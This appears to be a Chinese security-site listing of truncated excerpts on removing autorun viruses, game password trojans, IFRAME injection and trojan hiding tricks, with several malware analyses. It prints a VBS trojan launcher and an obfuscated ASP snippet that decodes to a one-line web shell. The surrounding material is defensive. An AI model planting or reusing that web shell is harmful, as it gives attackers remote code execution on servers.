最新病毒结合auto.exe,游戏盗号木马下载者手工查杀下面是启用病毒的代码microsofts.vbs[code]Set Lovecuteqq = CreateObject("Wscript.Shell")Lovecuteqq.run ("C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\microsofts.pif")[/code]木马名称：Trojan-PSW/Win32.OnLineGames.lxt路径：C:\WINDOWS\system32\k11987380222.exe查杀时间 ：2007-12-27&nbs...

今天遭遇auto病毒，他的动作包括每个盘根目录都有auto.exe,autorun.inf,注册表启动，任务管理器出现多个exe病毒，无法禁掉。k11986325364.exexkpnoo.exeC:\WINDOWS\ktwlqd.exelguezc.exeNAVMon32.exExqtflm.exevgdidn.exek11986299022.exek119862991512.exek119862991613.exek119862991815.exek119862992016.exek11986301162.exek11986303952.exek11986304017.exek119863...

最近公司和好朋友的网站纷纷被IFRAME了，有的挂上了鸽子，有的疯狂地弹窗，有的给人家增加流量。一个个文件去查找替换那些IFRAME代码，刚松口气，不久又加上去了，哎，什么世道！于是他们向我这个"JS高手"（他们强加给我的）求救，我也不能等闲视之，只好击键杀杀杀了。　　　　因为FF(Firefox)不怕IFRAME，于是就拿IE开刀，不知道比尔有没有奖发。我只写了一句代码，就搞定了，哈，痛快。就是IE only（特有的）的CSS中的属性expression，插进去试试，果然那些IFRAME不起作用了。代码如下：<style type="text/css" m...

木马是一种基于远程控制的病毒程序，该程序具有很强的隐蔽性和危害性，它可以在人不知鬼不觉的状态下控制你或者监视你。有人说，既然木马这么厉害，那我离它远一点不就可以了!　　然而这个木马实在是“淘气”，它可不管你是否欢迎，只要它高兴，它就会想法设法地闯到你“家”中来的!哎呀，那还了得，赶快看看自己的电脑中有没有木马，说不定正在“家”中兴风作浪呢!那我怎么知道木马在哪里呢，相信不熟悉木马的菜鸟们肯定想知道这样的问题。下面就是木马潜伏的诡招，看了以后不要忘记采取绝招来对付这些损招哟!　　1、集成到程序中　　其实木马也是一个服务器-客户端程序，它为了不让用户能轻易地把它删除，就常常集成到程序里，一旦用户激...

不知道怎样表达清楚。看例子吧：[code]<script language=vbs runat=server> Execute(HextoStr("65786563757465287265717565737428636872283335292929")) Function HextoStr(data) HextoStr="EXECUTE """"" C="&CHR(&H" N=")" Do While Len(data)>1 If&...

最基本的隐藏：不可见窗体＋隐藏文件木马程序无论如何神秘，但归根究底，仍是Win32平台下的一种程序。Windows下常见的程序有两种：1.Win32应用程序(Win32 Application)，比如QQ、Office等都属于此行列。2.Win32控制台程序(Win32 Console)，比如硬盘引导修复程序FixMBR。其中，Win32应用程序通常会有应用程序界面，比如系统中自带的“计算器”就有提供各种数字按钮的应用程序界面。木马虽然属于Win32应用程序，但其一般不包含窗体或隐藏了窗体(但也有某些特殊情况，如木马使用者与被害者聊天的窗口)，并且将木马文件属性设置为“隐藏...

教大家防木马的办法，只针对网页木马，有效率90%以上。可以防止90%以上木马在你的机器上被执行，甚至杀毒软件发现不了的木马都可以禁止执行，先说一下原理。 现在网页木马无非有以下几种方式中到你的机器里： 1、把木马文件改成BMP文件，然后配合你机器里的DEBUG来还原成EXE，网上存在该木马20% ； 2、下载一个TXT文件到你机器，然后里面有具体的FTP连接，FTP连上他们有木马的机器下载木马，网上存在该木马20%； 3、也是最常用的方式，下载一个HTA文件，然后用网页控件解释器来还原木马，该木马在网上存在50%以上； 4、采用JS脚...

病毒名称：Trojan-PSW.Win32.QQPass.ajo（Kaspersky）　　病毒别名：Worm.Win32.PaBug.cf（瑞星），Win32.Troj.QQPassT.ah.110771（毒霸）　　病毒大小：32,948 字节　　加壳方式：UPX　　样本MD5：772f4dfc995f7c1ad6d1978691190CDe　　样本SHA1：e9d2bcc5666a3433d5ef8cc836c4579f03f8b6cc　　关联病毒：　　传播方式：通过恶意网页传播、其它木马下载、优盘及移动硬盘传播　　技术分析　　==========　　木马运行后将自身复制到：　　C...

最近有朋友遭遇了8749病毒,痛苦,终于从毒霸官方找到了这款软件,大家可以试下简要介绍： 清除AV终结者/8749病毒；修复“映像劫持”；修复Autorun.inf；修复安全模式。更新说明： 10月16日：专杀增加功能：新增一新变种的查杀 8月15日： 专杀增加功能：新增8749变种b的查杀 7月31日： 专杀增加功能：增加了对8749最新变种的查杀 7月25日： 增加禁用和启用“自动运行”的功能 6月28日： 改善双核CPU下第一次点击保护按钮时可能比较慢的问题 6月22日：&nbs...

木马下载器Win32.TrojDownloader.Delf.114688病毒行为:该病毒是一个木马下载者,会从网上下载其他病毒至客户的机器上并运行.病毒运行后生衍生一个DLL文件至系统目录中.1.生成文件%WinDir%\System32\Downdll.dll2.修改注册表HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ConnectionsSavedLegacySettings = hex:3c,00,00,00,06,00,00,00,01,00,0...

病毒具体分析　　File: SFF.exe　　Size: 36864 bytes　　File Version: 2.00.0003　　MD5: 248C496DAFC1CC85207D9ADE77327F8B　　SHA1: B32191D44382ED926716671398809F88DE9A9992　　CRC32: 8C51AAAB　　编写语言：Microsoft Visual Basic 5.0 / 6.0　　病毒生成如下文件　　%system32%\svch...